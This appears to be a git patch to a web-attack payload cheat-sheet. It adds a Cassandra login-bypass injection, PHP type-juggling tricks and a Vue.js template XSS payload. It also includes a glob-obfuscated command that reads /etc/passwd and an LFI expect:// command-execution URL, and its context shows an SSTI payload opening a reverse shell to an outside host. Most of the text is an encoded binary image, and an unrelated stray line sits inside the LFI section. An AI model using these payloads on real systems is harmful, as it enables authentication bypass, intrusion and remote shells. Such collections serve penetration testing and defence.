From 2a080f82e68d6c5a91050f1f8a240bb0d2d708e2 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 10 Sep 2018 20:40:43 +0200 Subject: [PATCH] Cassandra SQL + XSS MD + PHP Type Juggling --- File Inclusion - Path Traversal/README.md | 6 +-- PHP juggling type/README.md | 34 ++++++++++++++-- Remote commands execution/README.md | 2 + SQL injection/Cassandra Injection.md | 37 ++++++++++++++++++ SQL injection/MySQL Injection.md | 2 +- SQL injection/README.md | 3 +- Server Side Template injections/README.md | 10 ++++- .../serverside.png | Bin 0 -> 44826 bytes XSS injection/README.md | 13 +++++- XSS injection/XSS in Angular.md | 6 +++ 10 files changed, 101 insertions(+), 12 deletions(-) create mode 100644 SQL injection/Cassandra Injection.md create mode 100644 Server Side Template injections/serverside.png diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index f5b936c..4370e8a 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -174,8 +174,8 @@ Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://ex ### Wrapper expect:// ```powershell -http://example.com/index.php?page=php:expect://id -http://example.com/index.php?page=php:expect://ls +http://example.com/index.php?page=expect://id +http://example.com/index.php?page=expect://ls ``` ### Wrapper input:// @@ -245,7 +245,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf ## LFI to RCE via upload (race) - +Worlds Quitest Let's Play" * Upload a file and trigger a self-inclusion. * Repeat 1 a shitload of time to: * increase our odds of winning the race diff --git a/PHP juggling type/README.md b/PHP juggling type/README.md index 6349f6d..0a54586 100644 --- a/PHP juggling type/README.md +++ b/PHP juggling type/README.md @@ -1,6 +1,35 @@ # PHP Juggling type and magic hashes -## Exploit +## Type Juggling + +True statements + +```php +var_dump('0010e2' == '1e3'); # true +var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0 +var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0 +var_dump('0x01' == 1) # true PHP 5.0 / false PHP 7.0 +var_dump('0x1234Ab' == '1193131'); + +'123' == 123 +'123a' == 123 +'abc' == 0 + +'' == 0 == false == NULL +'' == 0 # true +0 == false # true +false == NULL # true +NULL == '' # true +``` + +NULL statements + +```php +var_dump(sha1([])); # NULL +var_dump(md5([])); # NULL +``` + +## Magic Hashes - Exploit ```php ``` diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 0ccdced..6e78268 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -102,6 +102,8 @@ who$@ami Bypass blacklisted word with variable expansion ```powershell +/???/??t /???/p??s?? + test=/ehhh/hmtc/pahhh/hmsswd cat ${test//hhh\/hm/} cat ${test//hh??hm/} diff --git a/SQL injection/Cassandra Injection.md b/SQL injection/Cassandra Injection.md new file mode 100644 index 0000000..1084ce3 --- /dev/null +++ b/SQL injection/Cassandra Injection.md @@ -0,0 +1,37 @@ +# Cassandra Injection + +> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system + +## Cassandra comment + +```sql +/* Cassandra Comment */ +``` + +## Cassandra - Login Bypass + +### Login Bypass 0 + +```sql +username: admin' ALLOW FILTERING; %00 +password: ANY +``` + +### Login Bypass 1 + +```sql +username: admin'/* +password: */and pass>' +``` + +The injection would look like the following SQL query + +```sql +SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; +``` + +Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php) + +## Thanks to + +* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) \ No newline at end of file diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 79a70c6..88aaf92 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -1,6 +1,6 @@ # MYSQL Injection -## MySQL +## MySQL ```sql # MYSQL Comment diff --git a/SQL injection/README.md b/SQL injection/README.md index 595a7a0..63af6c2 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -1,6 +1,6 @@ # SQL injection -A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application +A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. ## Summary @@ -9,6 +9,7 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t * [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md) * [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md) * [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md) +* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/Cassandra%20Injection.md) * [Entry point detection](#entry-point-detection) * [DBMS Identification](#dbms-identification) * [SQL injection using SQLmap](#sql-injection-using-sqlmap) diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index e0e4899..7ce960f 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md @@ -201,15 +201,21 @@ Inject this template {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` -## AngularJS +## Client Side Template Injection -### AngularJS - Basic injection +### AngularJS ```javascript $eval('1+1') {{1+1}} ``` +### Vue JS + +```javascript +{{constructor.constructor('alert(1)')()}} +``` + ## Thanks to * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) diff --git a/Server Side Template injections/serverside.png b/Server Side Template injections/serverside.png new file mode 100644 index 0000000000000000000000000000000000000000..4733bec197ec18d8f4117361cf520a60e31dd7ab GIT binary patch literal 44826 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 